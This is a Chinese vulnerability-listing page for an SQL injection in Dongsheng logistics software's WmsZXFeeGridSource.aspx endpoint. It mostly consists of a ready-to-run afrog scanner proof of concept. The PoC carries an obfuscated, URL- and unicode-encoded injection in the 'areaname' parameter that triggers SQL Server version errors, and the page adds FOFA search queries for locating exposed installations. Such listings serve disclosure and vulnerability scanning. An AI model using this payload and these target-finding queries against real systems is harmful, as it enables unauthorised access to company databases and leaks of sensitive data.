dongshengwuliu-wmszxfeegridsource-sqli: 东胜物流软件 WmsZXFeeGridSource.aspx SQL注入漏洞

日期: 2025-09-01 | 影响软件: dongshengwuliu | POC: 已公开

漏洞描述

东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统 WmsZXFeeGridSource.aspx 存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库敏感信息 fofa:body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"

PoC代码[已公开]

id: dongshengwuliu-wmszxfeegridsource-sqli

info:
  name: 东胜物流软件 WmsZXFeeGridSource.aspx SQL注入漏洞
  author: avic123
  severity: high
  verified: true
  description: |
    东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统 WmsZXFeeGridSource.aspx 存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库敏感信息
    fofa:body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
  reference:
    - https://cn-sec.com/archives/4274921.html
  tags: dongshengwuliu,sqli
  created: 2025/08/18

rules:
  r0:
    request:
      method: GET
      path: /WMS_ZX/WmsZXFeeGridSource.aspx?areaname=%20%20%20%20%5c%75%30%30%33%31%5c%75%30%30%32%37%5c%75%30%30%36%31%5c%75%30%30%36%65%5c%75%30%30%36%34%5c%75%30%30%32%30%5c%75%30%30%33%31%5c%75%30%30%33%63%5c%75%30%30%34%30%5c%75%30%30%34%30%5c%75%30%30%35%36%5c%75%30%30%34%35%5c%75%30%30%35%32%5c%75%30%30%35%33%5c%75%30%30%34%39%5c%75%30%30%34%66%5c%75%30%30%34%65%5c%75%30%30%32%64%5c%75%30%30%32%64%20%20%20%20&read=%20%20%20%20areaname%20%20%20%20
    expression: response.status == 500 && response.body.bcontains(b"Microsoft SQL Server") && response.body.bcontains(b"SqlException:")

expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dongshengwuliu-wmszxfeegridsource-sqli.yaml

相关漏洞推荐